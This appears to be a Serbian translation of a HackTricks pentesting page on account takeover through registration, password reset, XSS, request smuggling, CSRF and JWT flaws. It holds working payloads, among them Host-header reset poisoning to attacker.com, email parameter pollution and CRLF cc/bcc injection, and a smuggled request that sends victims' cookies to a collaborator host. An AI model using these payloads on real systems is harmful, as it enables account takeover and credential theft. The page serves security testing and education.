11 KiB
Registracione i preuzimanje ranjivosti
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJAVU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
WhiteIntel
WhiteIntel je pretraživač pokretan dark-web-om koji nudi besplatne funkcionalnosti za proveru da li je kompanija ili njeni korisnici kompromitovani od strane malvera za krađu podataka.
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za besplatno na:
{% embed url="https://whiteintel.io" %}
Preuzimanje registracije
Duplikat registracije
- Pokušajte generisati koristeći već postojeće korisničko ime
- Proverite variranje email-a:
- velika slova
- +1@
- dodajte tačku u email
- specijalni karakteri u imenu email-a (%00, %09, %20)
- Stavite crne karaktere posle email-a:
test@test.com a
- victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
Enumeracija korisničkog imena
Proverite da li možete da saznate kada je korisničko ime već registrovano unutar aplikacije.
Politika lozinke
Prilikom kreiranja korisnika proverite politiku lozinke (proverite da li možete koristiti slabe lozinke).
U tom slučaju možete pokušati da probate lozinke metodom brute force.
SQL Injection
Proverite ovu stranicu da biste saznali kako pokušati preuzimanje naloga ili izvlačenje informacija putem SQL Injection-a u formama za registraciju.
Oauth preuzimanja
{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}
SAML ranjivosti
{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}
Promena email-a
Kada se registrujete pokušajte da promenite email i proverite da li je ova promena ispravno validirana ili možete promeniti na proizvoljne emaile.
Dodatne provere
- Proverite da li možete koristiti privremene emaile
- Dugačka lozinka (>200) dovodi do DoS-a
- Proverite ograničenja brzine pri kreiranju naloga
- Koristite username@burp_collab.net i analizirajte callback
Preuzimanje resetovanja lozinke
Curenje tokena za resetovanje lozinke putem referera
- Zatražite resetovanje lozinke na vašu email adresu
- Kliknite na link za resetovanje lozinke
- Ne menjajte lozinku
- Kliknite na bilo koje web stranice trećih lica (npr: Facebook, twitter)
- Presretnite zahtev u Burp Suite proxy-u
- Proverite da li referer zaglavlje otkriva token za resetovanje lozinke.
Trovanje resetovanja lozinke
- Presretnite zahtev za resetovanje lozinke u Burp Suite-u
- Dodajte ili izmenite sledeće zaglavlja u Burp Suite-u :
Host: attacker.com
,X-Forwarded-Host: attacker.com
- Prosledite zahtev sa izmenjenim zaglavljem
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
- Potražite URL za resetovanje lozinke na osnovu host zaglavlja kao što je :
https://attacker.com/reset-password.php?token=TOKEN
Resetovanje lozinke putem parametra email-a
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
IDOR na API parametrima
- Napadač mora da se prijavi sa svojim nalogom i da ode na opciju Promeni lozinku.
- Pokrenite Burp Suite i presretnite zahtev.
- Pošaljite ga na karticu za ponavljanje i izmenite parametre: ID korisnika/e-pošta
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Slab token za resetovanje lozinke
Token za resetovanje lozinke treba da bude generisan nasumično i jedinstven svaki put.
Pokušajte da utvrdite da li token ističe ili je uvek isti, u nekim slučajevima algoritam generisanja je slab i može biti pogodan. Sledeće promenljive mogu biti korišćene od strane algoritma.
- Vremenska oznaka
- ID korisnika
- E-pošta korisnika
- Ime i prezime
- Datum rođenja
- Kriptografija
- Samo brojevi
- Mali niz tokena (karakteri između [A-Z,a-z,0-9])
- Ponovna upotreba tokena
- Datum isteka tokena
Otkrivanje tokena za resetovanje lozinke
- Pokrenite zahtev za resetovanje lozinke koristeći API/UI za određenu e-poštu npr: test@mail.com
- Inspekcionišite odgovor servera i proverite
resetToken
- Zatim koristite token u URL-u kao što je
https://primer.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Resetovanje lozinke putem kolizije korisničkog imena
- Registrujte se na sistemu sa korisničkim imenom identičnim korisničkom imenu žrtve, ali sa belinama ubačenim pre i/ili posle korisničkog imena. npr:
"admin "
- Zatražite resetovanje lozinke sa svojim zlonamernim korisničkim imenom.
- Koristite token poslat na vašu e-poštu i resetujte lozinku žrtve.
- Povežite se sa nalogom žrtve sa novom lozinkom.
Platforma CTFd je bila ranjiva na ovaj napad.
Vidi: CVE-2020-7245
Preuzimanje naloga putem Cross Site Scripting-a
- Pronađite XSS unutar aplikacije ili poddomena ako su kolačići ograničeni na nadređeni domen:
*.domain.com
- Procureni trenutni kolačići sesije
- Autentifikujte se kao korisnik koristeći kolačić
Preuzimanje naloga putem HTTP zahteva Smuggling-a
1. Koristite smuggler da otkrijete tip HTTP zahteva Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Kreirajte zahtev koji će prebrisati POST / HTTP/1.1
sa sledećim podacima:
GET http://something.burpcollaborator.net HTTP/1.1 X:
sa ciljem preusmeravanja žrtava na burpcollab i krađe njihovih kolačića
3. Konačan zahtev bi mogao izgledati ovako
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
Hakerone izveštaji koji iskorišćavaju ovaj bag
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666
Preuzimanje naloga putem CSRF
- Kreirajte payload za CSRF, npr. "HTML obrazac sa automatskim slanjem za promenu lozinke"
- Pošaljite payload
Preuzimanje naloga putem JWT
JSON Web Token može se koristiti za autentifikaciju korisnika.
- Izmenite JWT sa drugim ID-jem korisnika / Email-om
- Proverite da li postoji slab potpis JWT-a
{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}
Reference
WhiteIntel
WhiteIntel je pretraživač pokretan dark-web-om koji nudi besplatne funkcionalnosti za proveru da li je kompanija ili njeni korisnici ugroženi od malvera za krađu podataka.
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za besplatno na:
{% embed url="https://whiteintel.io" %}
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJAVU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.